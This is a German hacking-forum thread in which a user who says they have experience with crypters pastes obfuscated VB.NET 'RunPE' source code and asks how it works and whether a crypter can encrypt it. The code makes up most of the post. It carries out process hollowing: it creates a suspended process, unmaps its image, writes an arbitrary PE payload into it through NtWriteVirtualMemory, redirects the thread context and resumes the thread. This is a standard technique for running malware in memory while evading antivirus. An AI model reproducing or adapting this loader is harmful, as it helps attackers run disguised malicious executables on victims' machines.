OK denke das es jetzt klappen wird.
Habe mit crypten schon erfahrung, läuft auch soweit gut.
aber wenn ich mir den runpe code anschau verstehe ich da nichts.
habe mir schon einige sachen über process hollowing angeschaut, dabei habe ich wenig gefunden wo mir was beibringen konnte.
würde gerne verstehen was die einyelnen funktionen im runpe code bedeuten und wie man den selber schreiben kann.
am besten über pm
hier der code
Code:
ein Moderator muss mir die Nachricht erst freischalten mit dem CodeCode:Imports System.Runtime.InteropServices Imports System.Text '''' <summary> '''' Coder : Rahoz '''' RunPE Coder : Simon-Binyo '''' Call : ( byte() , String ) '''' Purpose : Execute App In Memory from byte array '''' </summary> Public Class gFDLGDFASKL Public Declare Function dmAWRR Lib "kernel32" Alias "LoadLibraryA" (ByVal eXcI As String) As IntPtr Public Declare Function ZZvfGU Lib "kernel32" Alias "GetProcAddress" (ByVal HjrC As IntPtr, ByVal eXcI As String) As IntPtr Function BUeBsTZDkKEMbrG(Of T)(ByVal eXcI As String, ByVal KAvK As String) As T Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(ZZvfGU(dmAWRR(eXcI), KAvK), GetType(T)), Object), T) End Function Delegate Function NOJMkg(ByVal GBFW As IntPtr, ByVal EFfDmpqlB As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean Delegate Function Luoipi(ByVal CCPh As IntPtr, ByVal kPCK As IntPtr) As UInteger Delegate Function AAAAA(ByVal CCPh As IntPtr, ByVal kPCK As IntPtr, ByRef bufr As IntPtr, ByVal bufrMWayWhlwz As Integer, ByRef WZwg As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean Delegate Function NTJceg(ByVal GBFWead As IntPtr, ByVal NaQE As IntPtr) As UInteger Delegate Function RNzQc(ByVal GBFW As IntPtr, ByVal EFfDmpqlB As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean Delegate Function gNNNNN(ByVal CCPh As IntPtr, ByVal tDjF As IntPtr, ByVal MWayWhlwz As IntPtr, ByVal bQWh As Integer, ByVal oEtR As Integer) As IntPtr Delegate Function lkgzcI(ByVal CCPhess As IntPtr, ByVal DSvGRqwzF As IntPtr, ByVal Ebkb As Byte(), ByVal nMWayWhlwz As UInteger, ByVal awiftTtgC As Integer) As Boolean Public Declare Auto Function Pjfqge Lib "kernel32" Alias "CreateProcessW" (ByVal kEDd As String, ByVal SRqF As StringBuilder, ByVal EEXsqPyEy As IntPtr, ByVal fFOp As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal vdEz As Boolean, ByVal bGYB As Integer, ByVal KTKd As IntPtr, ByVal WGiN As String, ByVal meYX As Byte(), ByVal SHsY As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean Private Function CeCyARJ(ByVal FsQGol As Long, Optional ByVal zRwHpUb As Long = &H4) As Integer Dim qZYGUEz As IntPtr Dim WBiwMxI As Integer Dim eIfLI As AAAAA = BUeBsTZDkKEMbrG(Of AAAAA)("ntdll", "NtReadVirtualMemory") Call eIfLI(Process.GetCurrentProcess.Handle, FsQGol, qZYGUEz, zRwHpUb, WBiwMxI) Return qZYGUEz End Function Public Function GNMNioZVtaV(ByVal RIAkWcIh As Byte(), ByVal MRbichBw As String) As Boolean Try Dim Wakodbh As GCHandle = GCHandle.Alloc(RIAkWcIh, GCHandleType.Pinned) : Dim hModuleBase As Integer = Wakodbh.AddrOfPinnedObject : Wakodbh.Free() Dim EEXsqPyEy As IntPtr = IntPtr.Zero Dim yYEifvEzt As IntPtr() = New IntPtr(3) {} Dim PXYyxEHcm As Byte() = New Byte(67) {} Dim klhposaehf As Integer = BitConverter.ToInt32(RIAkWcIh, 60) Dim BmSklSftl As Integer Dim EFfDmpqlB As UInteger() = New UInteger(178) {} EFfDmpqlB(0) = &H10002 Pjfqge(Nothing, New StringBuilder(MRbichBw), EEXsqPyEy, EEXsqPyEy, False, 4, EEXsqPyEy, Nothing, PXYyxEHcm, yYEifvEzt) Dim gnzWsnHkF As Integer = (hModuleBase + CeCyARJ(hModuleBase + &H3C)) BmSklSftl = CeCyARJ(gnzWsnHkF + &H34) Dim qfXWO As Luoipi = BUeBsTZDkKEMbrG(Of Luoipi)("ntdll", "NtUnmapViewOfSection") qfXWO(yYEifvEzt(0), BmSklSftl) Dim WIqYC As gNNNNN = BUeBsTZDkKEMbrG(Of gNNNNN)("kernel32", "VirtualAllocEx") Dim DSvGRqwzF As IntPtr = WIqYC(yYEifvEzt(0), BmSklSftl, CeCyARJ(gnzWsnHkF + &H50), &H3000, &H40) Dim AEhEKTVFO As New IntPtr(BitConverter.ToInt32(RIAkWcIh, klhposaehf + &H34)) Dim MWayWhlwz As New IntPtr(BitConverter.ToInt32(RIAkWcIh, klhposaehf + 80)) Dim bdLBZrKmW As Integer Dim rszaetz As Integer Dim api8 As lkgzcI = BUeBsTZDkKEMbrG(Of lkgzcI)("ntdll", "NtWriteVirtualMemory") api8(yYEifvEzt(0), DSvGRqwzF, RIAkWcIh, CUInt(CInt(CeCyARJ(gnzWsnHkF + &H54))), bdLBZrKmW) For i = 0 To CeCyARJ(gnzWsnHkF + &H6, 2) - 1 Dim QcXOrDrbL As Integer() = New Integer(9) {} Buffer.BlockCopy(RIAkWcIh, (klhposaehf + &HF8) + (i * 40), QcXOrDrbL, 0, 40) Dim ljsdhhds As Byte() = New Byte((QcXOrDrbL(4) - 1)) {} Buffer.BlockCopy(RIAkWcIh, QcXOrDrbL(5), ljsdhhds, 0, ljsdhhds.Length) MWayWhlwz = New IntPtr(DSvGRqwzF.ToInt32() + QcXOrDrbL(3)) AEhEKTVFO = New IntPtr(ljsdhhds.Length) api8(yYEifvEzt(0), MWayWhlwz, ljsdhhds, CUInt(AEhEKTVFO), rszaetz) Next i Dim sdfsgt As NOJMkg = BUeBsTZDkKEMbrG(Of NOJMkg)("ntdll", "NtGetContextThread") sdfsgt(yYEifvEzt(1), EFfDmpqlB) api8(yYEifvEzt(0), EFfDmpqlB(41) + &H8, BitConverter.GetBytes(DSvGRqwzF.ToInt32()), CUInt(&H4), rszaetz) EFfDmpqlB(&H2C) = BmSklSftl + CeCyARJ(gnzWsnHkF + &H28) Dim ihsg As RNzQc = BUeBsTZDkKEMbrG(Of RNzQc)("ntdll", "NtSetContextThread") ihsg(yYEifvEzt(1), EFfDmpqlB) Dim ByZcV As NTJceg = BUeBsTZDkKEMbrG(Of NTJceg)("ntdll", "NtResumeThread") ByZcV(yYEifvEzt(1), 0) Catch ex As Exception Return False End Try Return True End Function End Class
---------- Post added at 23:56 ---------- Previous post was at 22:05 ----------
Kann ich eig. mein runpe Code mit einem Runpe Crypter verschlüsseln, und ganz normal ausführen?
Ergebnis 1 bis 7 von 7
Thema: Runpe Process Hollowing
Baum-Darstellung
-
26.01.2018, 21:56 #7Anfänger
- Registriert seit
- 14.01.2018
- Beiträge
- 6
Geändert von Barny (30.01.2018 um 10:30 Uhr)
ZitierenÄhnliche Themen
-
Unique RunPE
Von Anatoxis im Forum TrashboxAntworten: 2Letzter Beitrag: 30.05.2010, 23:10 -
[VB.NET Source] - RunPE
Von Sawyer im Forum TrashboxAntworten: 0Letzter Beitrag: 18.09.2009, 13:38 -
VB.NET - RunPE
Von Sawyer im Forum .NET Sprachen - TechnikenAntworten: 12Letzter Beitrag: 22.02.2009, 18:50 -
[VB.NET] RunPE Problem
Von hackerking im Forum .NET Sprachen - TechnikenAntworten: 1Letzter Beitrag: 21.12.2008, 00:29
